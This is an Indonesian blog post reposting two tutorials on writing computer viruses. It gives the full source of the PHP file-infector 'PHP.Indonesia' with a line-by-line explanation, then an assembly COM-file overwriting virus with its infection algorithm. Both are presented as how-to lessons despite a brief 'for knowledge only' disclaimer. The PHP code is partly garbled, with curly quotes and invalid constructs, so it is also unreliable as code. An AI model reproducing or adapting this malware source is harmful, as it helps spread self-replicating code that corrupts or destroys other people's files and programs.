Cara Sederhana membuat virus PHP

بِسْــــــــــــــــمِ اﷲِالرَّحْمَنِ اارَّحِيم

Posted by Unknown Selasa, 22 November 2011 0 komentar
dari pemilik blog : bahasan virus ini dari sumber :
http://hardskill.wordpress.com/2011/02/10/cara-sederhana-membuat-virus-php/

Membuat virus bisa dengan bahasa apa saja dan salah
satunya adalah dengan bahasa PHP. Pada artikel ini akan kita
lihat bagaimana virus PHP.Indonesia yang juga dikenal dengan
nama I-Worm.PHP.Indonesia dibuat.
OK,Sebelum saya di BOM…saya mau ngasih tau beberapa hal sbb :

  1. Artikel ini ditujukan buat menambah pengetahuan IT kita saja.
  2. Saya dan penulis asli artikel ini tidak bertanggungjawab Jika ada lamer yang bertindak bodoh dengan menyebarkan skrip ini.
  3. Judul asli artikel ini adalah “Simple technique how towrite PHP virus”.
  4. Artikel ini sebenar hanya iseng (http://berfikirdengan.wordpress.com).dan saya hanya menterjemahkannya kedalam bahasa indonesia,saya nanti akan mencantumkan kredit kepada sobat saya redIT,karna saya udah buat artikel ini memakai versi indonesia.
  5. Skrip yang saya pake disini juga merupakan skrip virus”PHP.Indonesia” udah terdeteksi Kaspersky nama”I-Worm.PHP.Indonesia”Ok…Kita mulai aja..!!
-Pertama2 gw kasih mentahan skrip PHP.Indonesia,nanti gw akan
coba ngejelasin
baris demi baris arti codenya.
——————————-Code——————————-
<?
// #################################################
// # PHP.Indonesia made for all Chicken looser ground the
world  #
// # By sevenC / N0:7
#
// # http://sevenc.vze.com
#
// # sevenC_zone@yahoo.com
#
// ##################################################
$jawa = “indonesia.php\n”;
$sumatra = “Wellcome to Indonesian PHPlovers.\n”;
$kalimantan = $jawa . $sumatra;
echo $kalimantan;
$all = opendir(‘C:\Windows\’);
$all1 = opendir(‘C:\My Documents\’);
$all2 = opendir(‘C:\InetPub\wwwRoot\’);
$all3 = $all && $all1 && $all2
while ($file = readdir($all3))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, ‘.php’)) || ($exe = strstr
($file, ‘.php2′)) || ($exe = strstr ($file, ‘.php3′)) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, “r”);
$look = fread($new, filesize($file));
$yes = strstr ($look, ‘indonesia.php’);
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, “a”);
$fputs($new, “<!– “);
$fputs($new, “PHP.indonesia – “);
$fputs($new, “By sevenC / N0:7, “);
$fputs($new, “http://trax.to/sevenC, “);
$fputs($new, “sevenC_Zone@yahoo.com, “);
$fputs($new, “SECTORS UNDERGROUND TEAM (Indonesia)”);
$fputs($new, “—>”);
$fputs($new, “<?php “);
$fputs($new, “include(\””);
$fputs($new, __FILE__);
$fputs($new, “\”); “);
$fputs($new, “?>”);
return;
}
}
closedir($all3);
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
?>
————————————–eoc———————–
Udah.. liat..? Mau belajar ? yeah… Gw akan coba jelasin
baris per baris
code virus PHP.Indonesia,tapi kalu gw salah mohon dikoreksi
yah…!! :) maklum
gw belum setaraf sama sevenC,hehehe… :P
————————————-begin———————-
<?
* Loe pasti tau kalo PHP musti dimulai make tanda ini –> <?
buat ngunjukin
browser kalo entu skrip PHP.
// ###############################################
// # PHP.Indonesia made for all Chicken looser ground the
world #
// # By sevenC / N0:7
#
// # http://sevenc.vze.com
#
// # sevenC_zone@yahoo.com
#
// ###############################################
* Pertama loe musti tau kalo komentar dalam PHP harus dimulai
dengan karakter –>> //
Jadi baris2 di atas engga akan di eksekusi karna cuman
komentar.
$jawa = “indonesia.php\n”;
* Pemberian nama variabel harus dimulai dengan karakter $
* Menset variabel jawa sama dengan string “indonesia.php” dan
\n ntu ganti baris
* Setiap satu baris kalimat musti diakhiri dengan karakter
titik koma à ;
$sumatra = “Wellcome to Indonesian PHPlovers.\n”;
* Menset variabel sumatra sama dengan string “Wellcome to
Indonesian PHPlovers”
$kalimantan = $jawa . $sumatra;
* var kalimantan = var gabungan jawa dan var sumatra
echo $kalimantan;
* Menulis variabel kalimantan kedalam texttream
$all = opendir(‘C:\Windows\’);
* var $all = membuka direktory windows
$all1 = opendir(‘C:\My Documents\’);
* var $all1 = membuka direktory My Documents
$all2 = opendir(‘C:\InetPub\wwwRoot\’);
* var $all2 = membuka directori wwwRoot
* karna saya rasa maksud sevenC membuka folder ini adalah
karna di PWS file-file PHP
* biasanya diletakan di direktori ini
$all3 = $all && $all1 && $all2
* $all3 = gabungan dari $all , $all1 dan $all3
while ($file = readdir($all3))
* Perulangan kita mulai ketika kita membaca isi direktori
{
* Inget dengan tanda ini..!!
$inf = true;
* menSet var $inf sebagai variabel boolean = true
$exe = false;
* menSet var $exe sebagai variabel boolean = false
if ( ($exe = strstr ($file, ‘.php’)) || ($exe = strstr
($file, ‘.phtml’)) || ($exe = strstr ($file, ‘.php3′)) )
* Lihatlah extensi2 file yang akan kita serang
(php,phtml,php3)
if ( is_file($file) && is_writeable($file) )
* Mencek atribut2 file,jika kita diijinkan menulis lalu
{
* Skali lagi jangan lupa tanda ini
$new = fopen($file, “r”);
* menSet $new = membuka file baru dengan atribut read only
yang hanya bisa dibaca saja
$look = fread($new, filesize($file));
* menSet $look = membaca var $new dan ukuran dari file
$yes = strstr ($look, ‘indonesia.php’);
* menSet $yes = $look , indonesia.php
if (!$yes) $inf = false;
* Jika bukan var $yes maka var $inf bernilai salah
}
if ( ($inf=false) )
* jika var $inf = salah kemudian
{
$new = fopen($file, “a”);
* menSet $new = membuka file ( variabel $file ) / file yang
diinfeksi
$fputs($new, “<!– “);
* tulis string “<!–” kedalam file tsb ($new)
$fputs($new, “PHP.indonesia – “);
* tulis string “PHP.indonesia – ” kedalam file tsb ($new)
$fputs($new, “By sevenC / N0:7, “);
* tulis string “By sevenC / N0:7, ” kedalam file tsb ($new)
$fputs($new, “http://trax.to/sevenC, “);
* tulis string “http://trax.to/sevenC, ” kedalam file tsb
($new)
$fputs($new, “sevenC_Zone@yahoo.com, “);
* tulis string “sevenC_Zone@yahoo.com, ” kedalam file tsb
($new)
$fputs($new, “SECTORS UNDERGROUND TEAM (Indonesia)”);
* tulis string tsb ($new) “SECTORS UNDERGROUND TEAM
(Indonesia)” kedalam file tsb ($new)
$fputs($new, “—>”);
* tulis string “—>” kedalam file tsb ($new)
$fputs($new, “<?php “);
* Tulis seluruh kode virus ini kedalam file tsb
$fputs($new, “include(\””);
* tulis string “include(\” kedalam file tsb ($new)
$fputs($new, __FILE__);
* Tulis juga seluruh kode / skrip asli dari file tsb
$fputs($new, “\”); “);
* Tulis “\” kedalam file tsb
$fputs($new, “?>”);
* Tulis “?>” kedalam file tsb
return;
* Ulangi langkah-langkah diatas
}
}
closedir($all3);
* menutup semua direktori yang aktif tadi ($all3)
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
* komentar om sevenC
?>
* Nutup skrip virus PHP ini
——————————–Selesai—————————
Ok… mudah-mudahan loe semua ngerti apa yang gw tulis
diatas,kalo kagak ? bodo amat :P
Kredit buat :
1. sevenC (http://trax.to/sevenC)
Biarpun umurnya masih belasan tapi gw salut banget sama
otaknya karna
Gw udah banyak belajar dari artikelnya.greatz & Thankz
man..!!
kapan neh bisa ktemuan ??
2. SECTORS (http://sectors.vze.com)
Makasih buat semua anak2 sectors baik yang masih aktif
maupun tidak di forum
teruskan perjuangan kalian, jangan mau bangsa kita ditindas
kebodohan.
Bantai semua lamer yang ada di Forum.
3. IVWA / Indonesian Virus Writer Association
(http://www.geocities.com/ivwa_staff)
Kapan neh peluncuran zine pertama ? gw udah gak sabar
neh…!!
4. semua anak2 yang pernah gw temuin di #sectors (woi channel
jangan ditinggal molo..!!)
saran dan kritik kirim ke stupy_man@yahoo.com
stupy (ex member of sectors)
stupy_man @ yahoo.com
Pemrograman Virus Komputer II
Thursday, February 13, 2003- Jumlah Klik [3091] , Penulis :
Dr`Ponidi
Jasakom – Bila dibandingkan dengan virus bacthfile, yang
pernah kita bicarakan maka virus yang kita bahas sekarang ini
telah memiliki kelima kemampuan seperti apa yang telah saya
sampaikan terdahulu.
1. Pendahuluan
Virus komputer yang akan dibicarakan dibawah ini ditulis dalam
bahasa assembley.Bila dibandingkan dengan virus bacthfile,
yang pernah kita bicarakan maka virus yang kita bahas sekarang
ini telah memiliki kelima kemampuan seperti apa yang telah
saya sampaikan terdahulu.
Virus ini mampu mencari semua file COM yang ada pada disket,
serta memeriksanya apakah telah tertular atau belum.Bila
belum, maka virus akan menularinya.Routine manipulasi yang
dimiliki virus ini hanyalah berupa tampilan pesan :”File ini
telah tertular Virus komputer!” atau “Semua file COM pada
disket ini telah tertular virus komputer!!!”.
Berbeda dengan virus batchfile yang menghasilkan file baru dan
membutuhkan beberapa file untuk menjalankannya, maka virus
yang akan kita bahas ini nantinya dapat bekerja sendiri dan
tidak menghasilkan file baru, sehingga kemampuan
menyembunyikan diri dari virus ini lebih baik.
Seperti halnya virus batchfile, virus dibawah ini adalah
termasuk jenis virus yang menumpangi program yang
ditularinya.Dengan demikian virus ini bersifat merusak.
2. Algoritma
Algoritma yang digunakan adalah sbb:
1.cari file COM yang pertama
2.buka dan baca file tersebut, letakkan pada buffer (di RAM)
3.Dengan membandingkan tanda pengenal virus dan rangkaian byte
bagian awal dari program, periksa apakah file tersebut telah
tertular virus atau belum.
4.a) Bila belum, maka tulari file tersebut dengan jalan
menyalin seluruh program virus ke file tersebut
(menumpangi).Kemudian tampilkan pesan :”File ini telah
tertular Virus Komputer !”
b) Bila sudah, maka carilah file COM berikutnya.Ulangi langkah
2.
5.Jika semua file COM telah tertular, maka tampilkan pesan :
“semua file Com pada disket ini telah tertular virus
komputer!!!”
3. Program dan Mekanisme Penularan
Program dibawah ini merupakan implementasi dari bagian diatas.
Catatan : Program virus ini menggunakan instruksi
macro.Definisi macro yang digunakan terdapat pada file
LAMMER.MAC.(klo pengen liat file macronya kirim email ke
Dr`Ponidi@crackdealer.com)
;——————————————————————————
; LAMMER.ASM
;
;CODE BY : #DEFACE-TEAM@IRC.DAL.NET
; #DHEGLENG@IRC.DAL.NET
;
;RETRIEVAL SYSTEM BY: DR`PONIDI@CRACKDEALER.COM
;
;VIRUS INI MENYERANG DAN MERUSAK SEMUA FILE COM.
;BERHATI-HATILAH!
;——————————————————————————
IF1
INCLUDE LAMMER.MAC
ENDIF
Code_segSEGMENT
ASSUME CS:Code_seg
ORG 100h
Mulai :jmp kerjakan
IdentitasDB `File ini telah tertular virus komputer !$`
PeringatanDB `semua file COM dalam disket ini telah
tertular virus`
DB `Komputer !!!$`
File_COMDB`*.com`,0h
Nama_fileDB 13 DUP(?)
Panjang_idequ 45
Panjang_virequ 445
Atributequ 20h
Open_codeequ 2
Jumlahequ 0ffffh
DTADB43 DUP(20h)
Kerjakan :Set_DTA DTA
Mov ax,0
Find_first file_COM,Atribut
Masih_adakah:cmp ax,0
Je Laksanakan
Cmp ax,2
Je Keluar
Tulis_string peringatan
Jmp Keluar
Keluar :Ke_dos
Laksanakan :mov si,offset DTA + 30
Pindahkan_string 13,nama_file
Buka_file_DTA DTA,Open_code
Push bx
Baca_file bx,Buffer,jumlah
Push ax
Mov di,offset Buffer + 3
Bandingkan-string Identitas,panjang_id
Cmp bx,0
Je Cari_lainnya
Mov si,100h
Pindahkan_string panjang_vir,Buffer
Pop ax
Pop bx
Push ax
Tutup_file bx
Hapus_file Nama_file
Buat_file Nama_file,Atribut
Buka_file Nama_file,Open_code
Pop ax
Tulis_file bx,buffer,ax
Tutup_file bx
Tulis_string identitas
Ke_dos
Cari_lainnya :pop ax
pop bx
Tutup_file bx
Find_next
Jmp masih_adakah
BufferLabel byte
Code_segENDS
END mulai
4. Penjelasan
Awal dari penularan dimulai ketika program virus ini
dijalankan pada disket yang berisi file-file COM.Virus
mula-mula akan menulari file COM yang pertama (berdasarkan
urutan file-file pada disket).Dengan penularan ini, maka file
tersebut menjadi sumber penularan baru, dan virus yang asli
dapat dihapus.File-file yang telah tertular ukurannya tidak
berubah.
Bila file yang telah tertular itu dijalankan, maka file itu
tidak dapat menjalankan fungsinya dan hanya akan menampilkan
pesan :”File ini telah tertular Virus komputer!”.Sebelumnya,
file tersebut akan menulari file COM lainnya.
Bila kebetulan file .COM pertama yang diserang didalam
directory utama adalah COMMAND.COM, maka setiap kali melakukan
boot dengan disket itu, tak akan pernah berhasil dan
sebelumnya virus akan menulari sebuah program COM lain yang
belum tertular.
Harap diperhatikan bahwa virus ini tidak dapat bekerja dengan
baik bila berada pada file COM yang ukurannya lebih kecil
daripada ukuran program virus yang asli, atau terlalu besar
(mendekati atau lebih dari FFFF heksadesimal = 64KB)
Ini disebabkan karena program virus tidak dapat disalin secara
lengkap atau buffer telah melampaui batas daerah CS (Code
Segment)
Demikianlah Artikel yang dapat saya sampaikan pada kesempatan
ini, Semoga informasi yang saya sampaikan dapat bermanfaat
bagi pengetahuan bagi kita semua ,khususnya bagi yang concern
terhadap virus.Sekian terima kasih cao……:) :) :)
TERIMA KASIH ATAS KUNJUNGAN SAUDARA
Judul: Cara Sederhana membuat virus PHP
Ditulis oleh Unknown
Rating Blog 5 dari 5
Semoga artikel ini bermanfaat bagi saudara. Jika ingin mengutip, baik itu sebagian atau keseluruhan dari isi artikel ini harap menyertakan link dofollow ke http://cintafido.blogspot.com/2011/11/cara-sederhana-membuat-virus-php.html. Terima kasih sudah singgah membaca artikel ini.

0 komentar:

Posting Komentar

Panduan blog dan SEO support Online Skill - Cinta fido Fido | Kopi kanan Akherat | Kisah Nabi Muhammad | Sahabat | Belajar Blogger | Template | HTML | Tutorial | Komputer.

investasi semoga anda senang

kurs mata uang BCA-2


Selamat datang di blog cinta fido, semoga anda diberi keSehatan oleh alloh SWT

Islam itu Cinta Damai Agama Islam Cinta Damai
jihad Damai adalah amal kebaikan yang Allah perintahkan dan menjadi sebab kokoh dan kemuliaan umat islam